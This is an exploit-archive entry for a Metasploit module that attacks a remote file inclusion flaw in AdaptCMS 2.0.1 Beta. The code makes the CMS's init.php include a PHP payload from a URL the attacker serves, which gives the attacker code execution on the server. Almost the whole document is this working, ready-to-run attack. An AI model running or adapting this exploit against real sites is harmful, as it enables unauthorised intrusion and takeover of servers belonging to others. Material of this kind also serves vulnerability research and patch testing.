AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)

2010-10-13
ID: 14415
CVE: None
Download vulnerable application: None
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
  require 'msf/core'
  class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
      include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer::PHPInclude
      def initialize(info = {})
        super(update_info(info,
            'Name'           => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
            'Description'    => %q{
                    This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
              },
            'Author'         => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision:$',
            'References'     =>             
                [
                    [ 'CVE', '2010-2618' ],
                    [ 'BID', '41116' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'ConnectionType' => 'find',
                        },
                    'Space'       => 262144, # 256k
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Oct 12 2010',
            'DefaultTarget' => 0))
          register_options([
            OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
            ], self.class)
    end
      def php_exploit
          timeout = 0.01
        uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
        print_status("Trying uri #{uri}")
          response = send_request_raw( {
                'global' => true,
                'uri' => uri,
            },timeout)
          if response and response.code != 200
            print_error("Server returned non-200 status code (#{response.code})")
        end
                  handler
    end
  end
1-4-2 (www01)